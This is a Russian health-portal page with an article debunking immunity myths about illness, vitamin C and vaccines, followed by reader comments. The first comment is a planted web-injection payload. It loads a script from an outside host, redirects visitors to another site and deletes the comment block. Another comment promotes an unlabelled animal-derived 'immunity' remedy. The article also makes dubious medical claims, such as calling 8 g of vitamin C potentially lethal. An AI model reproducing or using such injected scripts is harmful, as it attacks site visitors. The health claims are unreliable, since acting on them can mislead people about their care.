Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мифы об иммунитете  >>  Мифы об иммунитете
 
Обратная связь
 

Мифы об иммунитете

Размер шрифта
01 марта 2012 10:00
  • google_analytics: false
  • Нравится

Часто болеете и думаете, что у вас слабый иммунитет? Боитесь делать прививку против гриппа в опасный сезон? Быть может, прежде чем слепо верить некоторым мифам об иммунитете, стоит попробовать в них разобраться?

1

Миф 1. Если человек болеет – у него слабый иммунитет

При простуде, ОРЗ, гриппе обычно появляется насморк, покраснение горла и повышенная температура. Человек уверен, если он заболел, то у него снижен иммунитет.

Разрушаем миф

Нет! На самом деле, если такие симптомы наблюдаются, значит иммунитет реагирует на патогенные микроорганизмы. Симптомы простуды – это системные и местные реакции нашего иммунитета на вторжение. Болезнь – это проявление иммунитета-борца.

Объяснение врача

В организме существует специальный отряд иммунных клеток – Т-киллеров. Они регулярно обследуют все клетки, анализируя их рецепторы. Так они распознают чужеродные клетки, которыми могут оказаться болезнетворные микробы и вирусы, и убивают их.

Если температуры нет и болезнь протекает без симптомов, типичных для воспаления, - это признак слабого иммунитета.

Вывод: если при простуде или гриппе у вас есть температура, насморк и покраснение горла – это хорошо. Значит, ваш организм борется с инфекцией, а иммунитет работает правильно.

Миф 2. Витамин С укрепляет иммунитет

Считается, что применение витамина С во время эпидемии защищает наши клетки и не дает разрушаться их оболочкам, а значит он укрепляет иммунитет.

Разрушаем миф

Во время болезни вирусы воздействуют на клетки нашего организма, их мембраны разрушаются и клетки погибают. С одной стороны, витамин С стабилизирует мембраны клеток и помогает иммунитету, ведь он сильный антиоксидант. Но для того, чтобы витамин С помог организму, нужно принять большую дозу (8 г, или 16 таблеток, на разовый прием). Иначе эффекта не будет.

Объяснение врача

Витамин С, являясь мощным антиоксидантом, конечно поможет иммунитету справиться с простудой, но только при одном условии - если мы будем принимать его в огромной дозе, которая может быть смертельной. Витамин С - это кислота, большие дозы которой могут вызвать язву желудка или почечную недостаточность, что в результате убьет человека.

Вывод: витамин С может укрепить иммунитет, если принимать его в высоких дозах, что опасно для здоровья человека.

Миф 3. От вакцины можно заболеть

Многие люди остерегаются делать прививки от гриппа и себе, и своим детям, т.к. уверены, что от вакцины можно, наоборот, заболеть.

Разрушаем миф

От современных вакцин заболеть нельзя, по простой причине: они созданы таким образом, чтобы не заразить человека, это важное условие их производства. Вакцина помогает человеку выработать иммунный ответ на патогенный вирус.

Вакцины

Существует три вида вакцин:
 

  1. Живые (содержащие ослабленные вирусы)

  2. Инактивированные (содержащие только поверхностные клетки вирусов)

  3. Инактивированные расщепленные (содержащие синтезированный белок поверхностных клеток вируса)

Объяснение врача

Вакцина сохраняет те же свойства, что и настоящий вирус, но она не заразна. Вакцина имитирует вирусную инфекцию для того, чтобы спровоцировать иммунитет на борьбу с вирусом. Поэтому, когда в организм попадает настоящий болезнетворный вирус, его встречают выработанные благодаря вакцине антитела.

Вывод: делайте прививки, ведь главное условие создания вакцин – их эффективность при полной безопасности.




Cюжеты по теме:
Мифы про иммунитет. Развенчиваем неправильные представления 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - Инга1980

27 ноября 2016 в 00:43

Цитировать   |   Пожаловаться

Здравствуйте, помогите найти распростронителей препарата - трофосан называется. Он для востановления иммунитета, клеток внутренних органов, крови после тяжелых болезней и операций. И для поддержки иммунтета. Трофосан для чернобыльцев делали в 88-году для восстановления после аварии. Только он мне помог восстановить мои органы и кровь после ошибок молодости худения алкоголя болезней. Одна баночка ко мне случайно попала без Этикетки. Я не знаю толком его состав слышала только что для него используют вытяжку живых клеток с животных (до года) типа плазмы или стволовых клеток а мед просто как консервант. Очень много подделки. Знаю что оригинальный препарат в Ставрополе продают производитель (на крышке)  - БИОКОМ (Симферополь). Может кто еще пользовался и знает где купить.  Заранее спасибо. Пишите в личку или на здесь на сайт.

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.